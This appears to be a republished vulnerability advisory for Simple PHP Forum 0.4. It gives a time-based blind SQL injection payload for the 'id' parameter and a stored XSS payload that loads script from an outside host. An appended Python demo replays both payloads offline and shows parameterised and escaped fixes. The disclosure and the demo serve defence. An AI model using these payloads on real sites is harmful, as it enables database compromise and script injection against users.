
sphpforum 0.4 multiple vulnerabilities and fixes - Website Security - 自学php

Author: loneferret of Offensive Security
Affected product: sphpforum
Affected version: 0.4 (older versions may be affected)
Download: http://sourceforge.net/projects/sphpforum/

Product overview:
# Simple PHP Forum is a PHP based forum/BBS board designed to be small, simple,
# fast and to allow easy integration into any existing web site.

Vulnerability analysis:
# Due to improper input sanitization, parameters are prone to SQL injection. Stored
# cross-site scripting is also present in some forms.

# PoC 1:
# SQL injection (time-based blind, using MySQL's sleep())
# Page: view_topic.php / view_profile.php
# Vulnerable parameter: 'id'
# http://www.2cto.com/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271
# (URL-decoded, the injected id value is: 50' and sleep(10) and '1'='1 ; the page
#  returns the same content as before, but roughly 10 seconds later, which is how
#  the injection is confirmed without any visible error.)

# PoC 2:
# Stored XSS
# Page: create_topic.php
# Vulnerable field: Topic
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
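The page reproduces only the two proofs of concept and not the remediation its title promises. The following added example (written here; it is not the advisory's code and not code from the sphpforum project) replays both payloads offline against a constructed stand-in: an in-memory SQLite table whose layout is assumed, a registered `sleep()` user-defined function that only counts how often it is invoked (SQLite has no `SLEEP()`, so this stands in for the MySQL delay), and two minimal render functions that mimic echoing the stored Topic field. The vulnerable and fixed variants are shown side by side; the fixed variants correspond to PHP prepared statements and `htmlspecialchars()` respectively.

```python
import html
import sqlite3
from urllib.parse import unquote

# Payloads exactly as given in the advisory; PoC 1 is URL-decoded so it reaches
# the query the way PHP's $_GET['id'] would deliver it.
SQLI_PAYLOAD = unquote("50%27%20and%20sleep%2810%29%20and%20%271%27=%271")
XSS_PAYLOAD = "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>"


def make_db():
    """Constructed stand-in for the forum's topic table (assumed layout).

    Returns the connection and a counter dict. A user-defined sleep() is
    registered that only counts its invocations: if the counter moves, the
    attacker-controlled expression was parsed and executed as SQL.
    """
    conn = sqlite3.connect(":memory:")
    calls = {"sleep": 0}

    def fake_sleep(seconds):
        calls["sleep"] += 1
        return 0  # MySQL's SLEEP() also returns 0 once the delay has elapsed

    conn.create_function("sleep", 1, fake_sleep)
    conn.execute("CREATE TABLE topics (id TEXT PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO topics VALUES ('50', 'Constructed sample topic')")
    return conn, calls


def lookup_vulnerable(conn, topic_id):
    """The flaw the advisory describes: the id parameter is concatenated into
    the SQL string, so a quote in it ends the literal and the rest is parsed."""
    sql = "SELECT title FROM topics WHERE id='" + topic_id + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, topic_id):
    """Parameterised query (PHP equivalent: PDO / mysqli prepared statement).
    The whole payload is bound as one string value and simply matches no row."""
    return conn.execute("SELECT title FROM topics WHERE id=?", (topic_id,)).fetchall()


def probe_sqli(lookup, topic_id=SQLI_PAYLOAD):
    """Run `lookup` with the given id; return (rows, number of sleep() calls)."""
    conn, calls = make_db()
    rows = lookup(conn, topic_id)
    conn.close()
    return rows, calls["sleep"]


def render_title_vulnerable(title):
    """PoC 2 pattern: the stored Topic field is written back into HTML verbatim."""
    return "<h2>" + title + "</h2>"


def render_title_fixed(title):
    """Escape on output (PHP equivalent: htmlspecialchars($title, ENT_QUOTES))."""
    return "<h2>" + html.escape(title, quote=True) + "</h2>"


if __name__ == "__main__":
    rows, n = probe_sqli(lookup_vulnerable)
    print(f"vulnerable: rows={rows} sleep() executed {n} time(s)")
    rows, n = probe_sqli(lookup_fixed)
    print(f"fixed:      rows={rows} sleep() executed {n} time(s)")
    print("vulnerable:", render_title_vulnerable(XSS_PAYLOAD))
    print("fixed:     ", render_title_fixed(XSS_PAYLOAD))
```

Note that both the vulnerable and the fixed lookup return no rows for the PoC 1 payload: `sleep(10)` evaluates to 0, so the `AND` chain is false. That is exactly why the advisory's PoC is a blind, time-based test; the only observable difference between the two is whether `sleep()` ran, which in MySQL shows up as a 10 second delay rather than as a counter.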
